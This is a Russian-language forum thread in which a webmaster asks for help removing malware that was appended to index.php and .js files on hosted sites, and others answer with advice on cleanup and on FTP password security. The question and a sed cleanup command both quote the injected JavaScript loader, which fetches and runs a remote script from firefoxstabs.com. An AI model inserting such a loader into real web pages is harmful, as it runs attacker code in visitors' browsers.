На сайте завелся вирус — помогите побороть

Question

[smartlight]

Доброго времени суток!
Есть у меня хостинг и на нем хостятся несколько сайтов — несколько на друпале и несколько на самописных CMS.

На праздниках заметил что не работает парочка их них — браузер писал об ошибке.
Полез смотреть на index.php.
Оказалось в конец index.php был дописан такой код:

_script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script

_script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script_


Полазив по директориям сайтов обнаружил что такой код дописан во все файлы .js и index.php.

Код из файлов я удалил, но в некоторые файлы он опять дописался.
Помогите разобраться, плз.
Доступа к ssh нету.
Есть доступ только к Директ админ и ФТП.

Заранее спасибо

Answer 1

[yakubovsky]

Распространенная проблема. Троян у Вас на компе. Ворует пароль на фтп и потом подключается и дописывает свой код.
Сначала меняйте пароль через Директадмин на фтп акаунты, потом обращайтесь к тех. поддержке хостера. Они либо из бекапа вытянут файлы сайта либо почистят своими скриптами. У них есть самописные скрипты для выкусывания этой гадости. Каждый день с таким сталкиваются.

Answer 2

[Денис Туренко]

Это что-то новенькое, уже с jQuery вставляют код вредоносный, обычно банальным iframe балуются. С лечением согласен, лечите дырку у себя. Еще удалите все письма с доступами из своей почты, часто от туда таскают. Как бы волна таких заражений была год назад и все производители софта обзавелись встроенным антивирусами для своих продуктов (CMS).

Answer 3

[antivir]

Если уж пользуетесь FTP, но не используйте клиенты типа Far и Total Commander для этого, оттуда аккаунты вынимаются — только в путь. Среди клиентов, шифрующих пароли, могу предложить FlashFXP (скорее всего есть бесплатные аналоги).

Comments

[hayk]

У FlashFXP пароли тоже можно дешифровать.

[antivir]

Разработчик FlashFXP на форуме писал мне, что на дешифровку AES с не помню какой длиной ключа уйдут годы.
А теоретически, конечно, дешифровать можно вообще все. Если имеете ресурсы.

[iTs]

Давно уже… static.rbytes.net/fullsize_screenshots/f/l/flashfxp-password-decryption.jpg

[antivir]

Вы не совсем поняли. Данная программа вытаскивает нешифрованные аккаунты. Поставьте пароль во FlashFXP, получите AES-шифрование и программа будет бесполезна.

[antivir]

Вернее я изначально выразился некорректно. FlashFXP не шифрует аккаунты по-умолчанию, так как перед использованием они должны быть приведены к исходному виду и для этого по-любому нужно предъявлять какой-либо ключ. FlashFXP имеет функцию шифрования аккаунтов путем задания пароля-ключа, которые необходимо вводить при запуске.

[Dzen_Marketing]

Все эти ваши шифровки отлично ловятся на уровне «прокси» для траффика, уже пару лет назад видел я троев которые драйвером цеплялись и сниффели траффик

[antivir]

Снифить можно все, что угодно — клавиатуру, мышь, если надумаете пароль через экран вводить. Так при желании не поможет ничего.

[mankey]

Вопрос по безопасности хранения паролей:

1) в ФФ4, под мастер-паролем
2) в WinSCP, под мастер-паролем
3) в Notepad++ (плагин NppFTP), аналогично, под ним же

Гуглил когда-то на предмет способа их хранения — ничего толком не нашёл. Знаю только, что автособиралки паролей навроде Multi Password Recovery их не видят. Кто в теме, прокомментируйте, пожалуйста.

Answer 4

[smartlight]

спасибо

Answer 5

[Anatole]

Это может быть и дыра в скриптах, а не троян на локальной машинке.

Answer 6

[smartlight]

дело в том, что заражены были абсолютно все .js файлы, а вот .php файлы не все, а только выборочно.

Comments

[yakubovsky]

Заражаются *.js index.* main.* default.* как правило

[smartlight]

точно. так и есть.

Answer 7

[uadeveloper]

У меня та же проблема, тоже на выходных. (Вова, это не ты?)
Вы случайно не FileZilla пользуетесь?

Есть инфо как вирус удалить? (NOD не видит в упор)

Comments

[smartlight]

нет, я не Вова))
пользуюсь и FileZilla и Far — сменил пароль на фтп. Теперь сохранять их не буду 8)

Answer 8

[Виталий Перетятько]

Какие права доступа на те файлы которые заражены? Если у них стоит запись для всех — заражение скорее всего через уязвимостьв cms или скриптах на сайте (напимер широко известная дыра в phpmyadmin). Если записи для всех нет — ловите троянов на машине. И меняйте пароли. Я бы еще поискал по всем php на сайте base64_decode и eval — они обычно используются в вредоносных закладках.

Comments

[smartlight]

у всех файлов права 644

[bigdogsru]

Почти на всех массхостингах php работает с правами пользователя, поэтому никакие особенные права не требуются — в файлы с правами 644 с равным успехом могут писать и php-скрипты, и пользователь по фтп.

Answer 9

[ValdikSS]

grep -H 'firefoxstabs' ./ -R | cut -d: -f1 | xargs sed -i «s/document.write('<scr'+'ipt src=\»https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.5.1\/jquery.min.js\"><\/scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http:\/\/firefoxstabs.com\/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});//g"
grep -H 'firefoxstabs' ./ -R | cut -d: -f1 | xargs sed -i «s/

Comments

[ValdikSS]

Парсер съел. Вот. pastebin.com/41gbAwiz

Answer 10

[booblik]

Пароли из вашего клиента, чем бы они не шифровались, можно отследить при попытке коннекта к серверу, например.

Меняйте пароль, лечитесь.

Если нет прав на запуск консольного решения, пользуйтесь вот этим php-скриптом. Мануал есть в комментах к коду: pastie.org/1881332/wrap

Answer 11

[deactivatedtheelephant]

Я столкнулся с подобным вирусом на сайте клиента. Причем он был полиморфный!
Убил на гадость 4 часа времени, вычислял его «копии» и добавлял в скрипт который ходил по дереву и удалял. Где то 20-30 разных сигнатур получилось.